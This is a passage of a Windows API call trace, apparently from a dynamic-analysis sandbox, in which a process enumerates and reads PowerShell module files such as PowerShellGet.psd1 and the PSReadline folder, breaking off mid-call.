SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e3b0) returned 1 [0265.482] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1"), fInfoLevelId=0x0, lpFileInformation=0x1b81e490 | out: lpFileInformation=0x1b81e490*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0265.482] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e370) returned 1 [0265.483] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e3e0) returned 1 [0265.483] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1", nBufferLength=0x105, lpBuffer=0x1b81ded0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1", lpFilePart=0x0) returned 0x40 [0265.483] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\", nBufferLength=0x105, lpBuffer=0x1b81de70, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\", lpFilePart=0x0) returned 0x41 [0265.483] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\*", lpFindFileData=0x1b81e080 | out: lpFindFileData=0x1b81e080*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dafc0 [0265.483] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e0d0 | out: lpFindFileData=0x1b81e0d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0265.483] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e0d0 | out: lpFindFileData=0x1b81e0d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0265.483] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e0d0 | out: lpFindFileData=0x1b81e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97173029, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5ac4, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShellGet.psd1", cAlternateFileName="POWERS~1.PSD")) returned 1 [0265.483] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e0d0 | out: lpFindFileData=0x1b81e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97173029, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x45ce, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSGet.Format.ps1xml", cAlternateFileName="PSGETF~1.PS1")) returned 1 [0265.484] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e0d0 | out: lpFindFileData=0x1b81e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97173029, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x143ce, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSGet.Resource.psd1", cAlternateFileName="PSGETR~1.PSD")) returned 1 [0265.484] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e0d0 | out: lpFindFileData=0x1b81e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x74ac3, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSModule.psm1", cAlternateFileName="PSMODU~1.PSM")) returned 1 [0265.484] FindNextFileW (in: hFindFile=0x1a8dafc0, lpFindFileData=0x1b81e0d0 | out: lpFindFileData=0x1b81e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x74ac3, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSModule.psm1", cAlternateFileName="PSMODU~1.PSM")) returned 0 [0265.485] FindClose (in: hFindFile=0x1a8dafc0 | out: hFindFile=0x1a8dafc0) returned 1 [0265.485] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e330) returned 1 [0265.485] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e2f0) returned 1 [0265.485] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\1.0.0.1.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\1.0.0.1.psd1")) returned 0xffffffff [0265.485] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\1.0.0.1.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\1.0.0.1.psm1")) returned 0xffffffff [0265.485] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\1.0.0.1.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\1.0.0.1.cdxml")) returned 0xffffffff [0265.485] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\1.0.0.1.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\1.0.0.1.xaml")) returned 0xffffffff [0265.485] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\1.0.0.1.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\1.0.0.1.dll")) returned 0xffffffff [0265.485] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x105, lpBuffer=0x1b81e100, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", lpFilePart=0x0) returned 0x38 [0265.485] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e540) returned 1 [0265.485] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget"), fInfoLevelId=0x0, lpFileInformation=0x1b81e620 | out: lpFileInformation=0x1b81e620*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0265.485] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e500) returned 1 [0265.486] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e570) returned 1 [0265.486] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x105, lpBuffer=0x1b81e060, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", lpFilePart=0x0) returned 0x38 [0265.486] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\", lpFilePart=0x0) returned 0x39 [0265.486] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\*", lpFindFileData=0x1b81e210 | out: lpFindFileData=0x1b81e210*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbb60 [0265.486] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0265.486] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 1 [0265.486] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e260 | out: lpFindFileData=0x1b81e260*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0265.487] FindClose (in: hFindFile=0x1a8dbb60 | out: hFindFile=0x1a8dbb60) returned 1 [0265.487] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e4c0) returned 1 [0265.487] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e480) returned 1 [0265.487] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x105, lpBuffer=0x1b81e170, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x53 [0265.487] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e5b0) returned 1 [0265.487] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\powershellget.psd1"), fInfoLevelId=0x0, lpFileInformation=0x1b81e690 | out: lpFileInformation=0x1b81e690*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97173029, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5ac4)) returned 1 [0265.487] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e570) returned 1 [0265.487] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x105, lpBuffer=0x1b81de70, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x53 [0265.487] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e350) returned 1 [0265.487] CreateFileW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\powershellget.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x564 [0265.487] GetFileType (hFile=0x564) returned 0x1 [0265.487] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e2c0) returned 1 [0265.487] GetFileType (hFile=0x564) returned 0x1 [0265.488] ReadFile (in: hFile=0x564, lpBuffer=0x22fc078, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b81e428, lpOverlapped=0x0 | out: lpBuffer=0x22fc078*, lpNumberOfBytesRead=0x1b81e428*=0x1000, lpOverlapped=0x0) returned 1 [0265.488] ReadFile (in: hFile=0x564, lpBuffer=0x22fc078, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b81e428, lpOverlapped=0x0 | out: lpBuffer=0x22fc078*, lpNumberOfBytesRead=0x1b81e428*=0x1000, lpOverlapped=0x0) returned 1 [0265.488] ReadFile (in: hFile=0x564, lpBuffer=0x22fc078, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b81e428, lpOverlapped=0x0 | out: lpBuffer=0x22fc078*, lpNumberOfBytesRead=0x1b81e428*=0x1000, lpOverlapped=0x0) returned 1 [0265.489] ReadFile (in: hFile=0x564, lpBuffer=0x22fc078, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b81e428, lpOverlapped=0x0 | out: lpBuffer=0x22fc078*, lpNumberOfBytesRead=0x1b81e428*=0x1000, lpOverlapped=0x0) returned 1 [0265.489] ReadFile (in: hFile=0x564, lpBuffer=0x22fc078, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b81e428, lpOverlapped=0x0 | out: lpBuffer=0x22fc078*, lpNumberOfBytesRead=0x1b81e428*=0x1000, lpOverlapped=0x0) returned 1 [0265.489] ReadFile (in: hFile=0x564, lpBuffer=0x22fc078, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b81e428, lpOverlapped=0x0 | out: lpBuffer=0x22fc078*, lpNumberOfBytesRead=0x1b81e428*=0xac4, lpOverlapped=0x0) returned 1 [0265.489] ReadFile (in: hFile=0x564, lpBuffer=0x22fb67c, nNumberOfBytesToRead=0x13c, lpNumberOfBytesRead=0x1b81e428, lpOverlapped=0x0 | out: lpBuffer=0x22fb67c*, lpNumberOfBytesRead=0x1b81e428*=0x0, lpOverlapped=0x0) returned 1 [0265.489] ReadFile (in: hFile=0x564, lpBuffer=0x22fc078, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b81e428, lpOverlapped=0x0 | out: lpBuffer=0x22fc078*, lpNumberOfBytesRead=0x1b81e428*=0x0, lpOverlapped=0x0) returned 1 [0265.489] CloseHandle (hObject=0x564) returned 1 [0265.490] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.psd1")) returned 0xffffffff [0265.491] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.psm1")) returned 0xffffffff [0265.491] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.cdxml")) returned 0xffffffff [0265.491] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.xaml")) returned 0xffffffff [0265.491] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\PowerShellGet.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\powershellget.dll")) returned 0xffffffff [0265.491] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e510) returned 1 [0265.491] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline", lpFilePart=0x0) returned 0x35 [0265.491] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\", nBufferLength=0x105, lpBuffer=0x1b81dfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\", lpFilePart=0x0) returned 0x36 [0265.491] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\*", lpFindFileData=0x1b81e1b0 | out: lpFindFileData=0x1b81e1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbb60 [0265.492] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0265.492] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.1", cAlternateFileName="")) returned 1 [0265.492] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0265.492] FindClose (in: hFindFile=0x1a8dbb60 | out: hFindFile=0x1a8dbb60) returned 1 [0265.492] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e460) returned 1 [0265.492] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e420) returned 1 [0265.492] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b81e510) returned 1 [0265.492] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline", nBufferLength=0x105, lpBuffer=0x1b81e000, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline", lpFilePart=0x0) returned 0x35 [0265.492] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\", nBufferLength=0x105, lpBuffer=0x1b81dfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\", lpFilePart=0x0) returned 0x36 [0265.492] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\*", lpFindFileData=0x1b81e1b0 | out: lpFindFileData=0x1b81e1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a8dbb60 [0265.493] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0265.493] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.1", cAlternateFileName="")) returned 1 [0265.493] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e200 | out: lpFindFileData=0x1b81e200*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.1", cAlternateFileName="")) returned 0 [0265.495] FindClose (in: hFindFile=0x1a8dbb60 | out: hFindFile=0x1a8dbb60) returned 1 [0265.495] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b81e460) returned 1 [0265.495] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e070 | out: lpFindFileData=0x1b81e070*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0265.496] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e070 | out: lpFindFileData=0x1b81e070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en", cAlternateFileName="")) returned 1 [0265.496] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e070 | out: lpFindFileData=0x1b81e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97199283, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x25200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.PSReadline.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0265.496] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e070 | out: lpFindFileData=0x1b81e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97199283, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2e1, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSReadline.psd1", cAlternateFileName="PSREAD~1.PSD")) returned 1 [0265.497] FindNextFileW (in: hFindFile=0x1a8dbb60, lpFindFileData=0x1b81e070 | out: lpFindFileData=0x1b81e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97199283, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb4, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSReadline.psm1", cAlternateFileName="PSREAD~1.PSM")) returned 1 [0265.497] FindNextFileW (in: 